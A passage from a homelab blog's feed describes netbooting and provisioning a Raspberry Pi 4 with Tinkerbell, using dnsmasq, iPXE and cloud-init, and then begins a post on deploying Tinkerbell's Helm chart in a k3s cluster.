dnsmasq-dhcp[3309]: 3924602938 sent size:  1 option: 53 message-type  5
dnsmasq-dhcp[3309]: 3924602938 sent size:  4 option: 54 server-identifier  203.0.113.18
dnsmasq-dhcp[3309]: 3924602938 sent size:  9 option: 60 vendor-class  50:58:45:43:6c:69:65:6e:74
dnsmasq-dhcp[3309]: 3924602938 sent size: 17 option: 97 client-machine-id  00:15:31:c0:00:00:00:00:00:00:00:e4:5f:01...
</code></pre><p>This got me a little bit further, but ended with the Pi dropping me into the
UEFI firmware screen:</p>
<figure>
    <img loading="lazy" src="uefi-fw-screen.jpg"
         alt="A picture of a screen showing the UEFI firmware config screen. Similar to an x86 UEFI menu, it shows information about the Pi like its CPU and RAM. Options include setting the language, and entering submenus for Device Manager, Boot Manager and Boot Maintenance Manager. It doesn&#39;t show any indication of why the UEFI menu is shown."/> <figcaption>
            <p>Instead of booting HookOS, I&rsquo;m ending up in the UEFI config menu.</p>
        </figcaption>
</figure>

<p>To fix the issue, I had to tell iPXE where to fetch the iPXE script, which I did
with the following lines in the Dnsmasq config:</p>
<pre tabindex="0"><code>dhcp-match=tinkerbell, option:user-class, Tinkerbell
pxe-service=tag:tinkerbell,ARM64_EFI,&#34;EFI Netboot IPXE&#34;,http://203.0.113.200/auto.ipxe
</code></pre><p>This had no effect at all, or at least that was what it looked like to me. I just
ended up on the same UEFI screen. But right before that, I saw flashes of an
error message, but wasn&rsquo;t able to really see it. After some vain attempts at
changing the <code>pxe-service</code> line, I gave in and connected a keyboard. Pressing
CTRL+b right after the iPXE binary started running, I got into an iPXE shell.
I then just ran the <code>autoboot</code> command and finally got my error: The DHCP
response was correct, iPXE was trying to fetch the iPXE script from the right
place, it seemed. But it got a &ldquo;Connection reset by peer&rdquo; error. And then it
dawned on me: Tinkerbell&rsquo;s HTTP server wasn&rsquo;t running on port 80. So the fix
was simple, I changed the two lines from above to these:</p>
<pre tabindex="0"><code>dhcp-match=tinkerbell, option:user-class, Tinkerbell
dhcp-boot=tag:tinkerbell,&#34;http://203.0.113.200:7171/auto.ipxe&#34;,,&#34;{{ .Values.tinkerbellIP }}&#34;
</code></pre><p>The switch from <code>pxe-service</code> to <code>dhcp-boot</code> was necessary because the iPXE script
was not requesting PXE options in its DHCP request, and consequently, Dnsmasq did
not send a PXE answer. Instead, iPXE was just expecting a boot file option being
set.</p>
<p>The <code>auto.ipxe</code> &ldquo;file&rdquo; is a clever implementation detail from Tinkerbell worth
talking about a bit. This file is an iPXE script, which can use the <a href="https://ipxe.org/cmd">iPXE commands</a>
running in batch mode. The script can be found <a href="https://github.com/tinkerbell/tinkerbell/blob/v0.18.3/smee/internal/ipxe/script/hook.go">here</a>.
Instead of delivering a static script of some sort, Tinkerbell dynamically generates
the iPXE script for each individual host. The script always does the same thing
in principle: It loads the kernel and initramfs and defines the kernel command
line and then boots into the kernel. But due to the dynamic nature, the kernel
and initramfs can be set individually for every host in the Hardware manifest.</p>
<h2 id="getting-tinkerbell-to-send-the-autoipxe-script">Getting Tinkerbell to send the auto.ipxe script</h2>
<p>At this point, I was getting errors from Tinkerbell, because I hadn&rsquo;t created a
Hardware object for the Pi yet. I created this one:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">tinkerbell.org/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Hardware</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">testpi</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">instance</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">id</span>: <span style="color:#ae81ff">e4:5f:01:bc:f4:ce</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ips</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">address</span>: <span style="color:#ae81ff">203.0.113.70</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allow_pxe</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">hostname</span>: <span style="color:#ae81ff">testpi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">operating_system</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">distro</span>: <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">version</span>: <span style="color:#e6db74">&#34;24.04&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">disks</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">device</span>: <span style="color:#ae81ff">/dev/sda</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interfaces</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">dhcp</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">arch</span>: <span style="color:#ae81ff">aarch64</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">hostname</span>: <span style="color:#ae81ff">testpi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mac</span>: <span style="color:#ae81ff">e4:5f:01:bc:f4:ce</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ip</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">address</span>: <span style="color:#ae81ff">203.0.113.70</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">netmask</span>: <span style="color:#ae81ff">255.255.255.0</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name_servers</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">10.86.25.254</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">uefi</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">netboot</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowPXE</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowWorkflow</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">userData</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    #cloud-config
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    packages:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - openssh-server
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - python3
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - sudo
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    ssh_pwauth: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    disable_root: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    allow_public_ssh_keys: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    timezone: &#34;Europe/Berlin&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    users:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - name: imhotep
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        shell: /bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        ssh_authorized_keys:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - from=&#34;192.0.2.100&#34; ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOaxn8l16GNyBEgYzWO0BAko9fw8kkIq9tbels3hXdUt user@foo
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        sudo: ALL=(ALL:ALL) ALL
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    runcmd:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - systemctl enable ssh.service
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - systemctl start ssh.service
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    power_state:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      delay: 2
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      timeout: 2
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      mode: reboot</span>
</span></span></code></pre></div><p>Note specially the <code>spec.interfaces.netboot.allowPXE: false</code> option. This tells
Tinkerbell that it shouldn&rsquo;t be sending any answer to the host&rsquo;s DHCP requests
while PXE booting. I had to set the option, because by default, Tinkerbell
would answer the initial DHCP request with a DHCP reply instructing the Pi to
download the iPXE binary from Tinkerbell straight away. This works with normal
PXE boot, but the Pi&rsquo;s network boot is a bit special. It has to get stuff like
the <code>config.txt</code> file from the TFTP server as well, and Tinkerbell can&rsquo;t do that.
Yet. I will go into a bit more detail at the end.</p>
<p>But even with this config set, the <code>auto.ipxe</code> script was not getting delivered.
This time Tinkerbell output the following error message:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;time&#34;</span>:<span style="color:#e6db74">&#34;2025-06-26T19:02:24.911697105Z&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;0&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;caller&#34;</span>:<span style="color:#e6db74">&#34;smee/internal/ipxe/script/ipxe.go:169&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;the hardware data for this machine, or lack there of, does not allow it to pxe&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;service&#34;</span>:<span style="color:#e6db74">&#34;smee&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;client&#34;</span>:<span style="color:#e6db74">&#34;203.0.113.70:42502&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;error&#34;</span>:<span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;time&#34;</span>:<span style="color:#e6db74">&#34;2025-06-26T19:02:24.911752728Z&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;0&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;caller&#34;</span>:<span style="color:#e6db74">&#34;smee/internal/ipxe/http/middleware.go:37&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;response&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;service&#34;</span>:<span style="color:#e6db74">&#34;smee&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;method&#34;</span>:<span style="color:#e6db74">&#34;GET&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;uri&#34;</span>:<span style="color:#e6db74">&#34;/auto.ipxe&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;client&#34;</span>:<span style="color:#e6db74">&#34;203.0.113.70&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;duration&#34;</span>:<span style="color:#ae81ff">160896</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;status&#34;</span>:<span style="color:#ae81ff">404</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>So because <code>allowPXE</code> is <code>false</code> for the Pi, it also doesn&rsquo;t get to download
the <code>auto.ipxe</code> script. My ultimate solution for this was to completely disable
DHCP for Tinkerbell and then setting <code>allowPXE: true</code> for the Pi.
I was able to disable DHCP completely with this setting in Tinkerbell&rsquo;s <code>values.yaml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">deployment</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">envs</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">smee</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dhcpEnabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>And after that, the Pi was able to boot into HookOS without further issue. I will talk
about why this is suboptimal in the last section of this post.</p>
<h2 id="provisioning-the-pi">Provisioning the Pi</h2>
<p>Setting up the actual provisioning went rather smoothly after all of that. I
followed the same approach as I did for the VM in the <a href="https://blog.mei-home.net/posts/tinkerbell-3-install-and-first-provisioning/">previous post</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">tinkerbell.org/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Template</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pi-template</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    name: pi-template
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    version: &#34;0.1&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    global_timeout: 600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    tasks:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - name: &#34;os installation&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        worker: &#34;{{`{{.machine_mac}}`}}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        volumes:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - /dev:/dev
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - /dev/console:/dev/console
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        actions:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;install ubuntu&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: quay.io/tinkerbell/actions/image2disk:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 900
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                IMG_URL: https://s3.example.com/public/images/mypi-image.img
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                DEST_DISK: /dev/sda
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                COMPRESSED: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;add cloud-init config&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: quay.io/tinkerbell/actions/writefile:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 90
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_DISK: {{ `{{ formatPartition ( index .Hardware.Disks 0 ) 2 }}` }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_PATH: /etc/cloud/cloud.cfg.d/10_tinkerbell.cfg
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DIRMODE: &#34;0700&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              FS_TYPE: ext4
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              GID: &#34;0&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              MODE: &#34;0600&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              UID: &#34;0&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              CONTENTS: |
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                datasource:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  Ec2:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                    metadata_urls: [&#34;http://203.0.113.200:7172&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                    strict_id: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                manage_etc_hosts: localhost
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                warnings:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  dsid_missing_source: off
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;add cloud-init ds-identity&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: quay.io/tinkerbell/actions/writefile:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 90
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_DISK: {{ `{{ formatPartition ( index .Hardware.Disks 0 ) 2 }}` }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              FS_TYPE: ext4
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_PATH: /etc/cloud/ds-identify.cfg
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              UID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              GID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              MODE: 0600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DIRMODE: 0700
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              CONTENTS: |
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                datasource: Ec2
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;remove default user data&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: quay.io/tinkerbell/actions/writefile:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 90
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_DISK: {{ `{{ formatPartition ( index .Hardware.Disks 0 ) 1 }}` }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              FS_TYPE: vfat
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_PATH: /user-data
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              UID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              GID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              MODE: 0600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DIRMODE: 0700
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              CONTENTS: |
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                # Removed during provisioning
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;remove default meta data&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: quay.io/tinkerbell/actions/writefile:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 90
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_DISK: {{ `{{ formatPartition ( index .Hardware.Disks 0 ) 1 }}` }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              FS_TYPE: vfat
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_PATH: /meta-data
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              UID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              GID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              MODE: 0600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DIRMODE: 0700
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              CONTENTS: |
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                # Removed during provisioning
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;remove default network config&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: quay.io/tinkerbell/actions/writefile:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 90
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_DISK: {{ `{{ formatPartition ( index .Hardware.Disks 0 ) 1 }}` }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              FS_TYPE: vfat
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_PATH: /network-config
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              UID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              GID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              MODE: 0600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DIRMODE: 0700
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              CONTENTS: |
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                # Removed during provisioning
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;reboot&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: ghcr.io/jacobweinstock/waitdaemon:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 90
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            pid: host
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            command: [&#34;reboot&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              IMAGE: alpine
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              WAIT_SECONDS: 10
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            volumes:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              - /var/run/docker.sock:/var/run/docker.sock</span>
</span></span></code></pre></div><p>The one noteworthy change here is in the files I&rsquo;m removing/emptying. With the
VM image, I had created that myself via the Ubuntu installer and Packer. But for
the Pi, I was able to use the official Ubuntu preinstalled Raspberry Pi image.
But that does have default <code>user-data</code> and <code>network-config</code> files as well. In
the Pi image, those are located on the boot partition:</p>
<ul>
<li><code>/user-data</code></li>
<li><code>/meta-data</code></li>
<li><code>/network-config</code></li>
</ul>
<p>With these files removed, the Ubuntu image properly made use of the metadata
server Tinkerbell provides and executed the <code>user-data</code> instructions delivered
by it and defined in the Hardware object of the Raspberry Pi.</p>
<p>So now I finally had a fully provisioned Pi, without any manual intervention:</p>
<figure>
    <img loading="lazy" src="pi-ubuntu-booted.jpg"
         alt="A picture of a screen showing the final lines of an Ubuntu boot. It shows the Ubuntu version as 24.02.2 LTS, some lines indicating that cloud-init ran successfully and finally a login prompt for the host testpi."/> <figcaption>
            <p>Final successful Ubuntu provisioned boot.</p>
        </figcaption>
</figure>

<h2 id="next-steps">Next steps</h2>
<p>The next phase of the Tinkerbell project will require me to don my thinking cap
and probably try to write some Go code. As I&rsquo;ve shown above, booting a Pi 4 is
possible. But provisioning a Pi 5 the same way is not. The reason for that is
that the Pi 5 UEFI project seems to be dead, looking at the <a href="https://github.com/worproject/rpi5-uefi">archived repo</a>.
Additionally, the approach I&rsquo;ve shown above requires DHCP to be completely
switched off in Tinkerbell, because I needed to enable <code>allowPXE</code> to get the
<code>auto.ipxe</code> script, but at the same time Tinkerbell cannot provide the files
necessary for the initial PXE boot into UEFI/iPXE for a Pi.</p>
<p>But there might be a way around all of these issues, which should also work with
the Pi 5: Booting into HookOS directly, skipping UEFI and iPXE. This should be
possible by setting HookOS&rsquo; kernel and initramfs in the <code>config.txt</code> file for
direct boot via the Pi&rsquo;s firmware. The downside of this approach is that I&rsquo;m losing
Tinkerbell&rsquo;s ability of adapting e.g. the kernel command line dynamically, as it
does when booting through the iPXE script. Tinkerbell would only enter the picture
after HookOS is already booted up.</p>
<p>Then there&rsquo;s also the issue with diskless hosts which netboot not only for their
initial provisioning via Tinkerbell, but instead would always netboot. The
biggest issue here is how to distinguish between the two. When the host needs to
be provisioned, it needs to be told to PXE boot into HookOS. If it is just doing
a normal boot, it needs to boot into its own kernel and initramfs. The best
decision point I can imagine for that are Tinkerbell&rsquo;s workflows. They can be in
different states, and they&rsquo;re set to a &ldquo;done&rdquo; state when all of their tasks have
been executed successfully for a given host. So whenever a DHCP request arrives,
I could check whether that host has any pending workflows. If it does, I tell
it to boot into HookOS, and otherwise I have it continue the boot normally.</p>
<p>Lots to think about. But I&rsquo;m enjoying it - there&rsquo;s certainly been a lot more &ldquo;lab&rdquo;
in my Homelab than usual. &#x1f601;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Tinkerbell Part III: Install and First Provisioning</title>
      <link>https://blog.mei-home.net/posts/tinkerbell-3-install-and-first-provisioning/</link>
      <pubDate>Sat, 21 Jun 2025 20:30:01 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/tinkerbell-3-install-and-first-provisioning/</guid>
      <description>I deploy Tinkerbell on my k3s cluster and provision the first VM with it</description>
      <content:encoded><![CDATA[<p>In this post, I will describe how I deployed <a href="https://tinkerbell.org/">Tinkerbell</a>
into my k3s cluster and provisioned the first Ubuntu VM with it.</p>
<p>This is part 3 of my <a href="https://blog.mei-home.net/tags/series-tinkerbell/">Tinkerbell series</a>.</p>
<h2 id="deploying-tinkerbell">Deploying Tinkerbell</h2>
<p>The first step is to deploy Tinkerbell into the k3s cluster I set up in the
<a href="https://blog.mei-home.net/posts/tinkerbell-2-lab-setup/">previous post</a>. For this, I used
the official Helm chart, which can be found <a href="https://github.com/tinkerbell/tinkerbell/tree/main/helm/tinkerbell">here</a>.</p>
<p>My <code>values.yaml</code> file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">publicIP</span>: <span style="color:#e6db74">&#34;203.0.113.200&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">trustedProxies</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;10.42.0.0/24&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">artifactsFileServer</span>: <span style="color:#e6db74">&#34;http://203.0.113.200:7173&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">deployment</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">envs</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">tinkController</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enableLeaderElection</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">smee</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dhcpMode</span>: <span style="color:#e6db74">&#34;proxy&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">globals</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enableRufioController</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enableSecondstar</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">logLevel</span>: <span style="color:#ae81ff">3</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">init</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">lbClass</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">optional</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hookos</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">lbClass</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kernelVersion</span>: <span style="color:#e6db74">&#34;both&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">persistence</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">existingClaim</span>: <span style="color:#e6db74">&#34;hookos-volume&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubevip</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>The first setting, <code>publicIP</code>, is the public IP under which Tinkerbell&rsquo;s services
will be available to other machines. It will be used in DHCP responses for the
next server, download URLs for iPXE scripting and so forth. It will also be set
as the <code>loadBalancerIP</code> in the Service manifest created by the chart. In my
case, this is a VIP controlled by a kube-vip deployment I will go into more
detail on later. The <code>trustedProxies</code> entry is just the CIDR for Pods in
my k3s cluster. The <code>artifactsFileServer</code> is the address for the HookOS artifacts,
in this case the kernel and initrd. The Tinkerbell chart sets up a small Nginx
deployment for this and automatically downloads the newest HookOS artifacts to
it. This is configured under <code>optional.hookos</code>. I&rsquo;m also disabling a few things
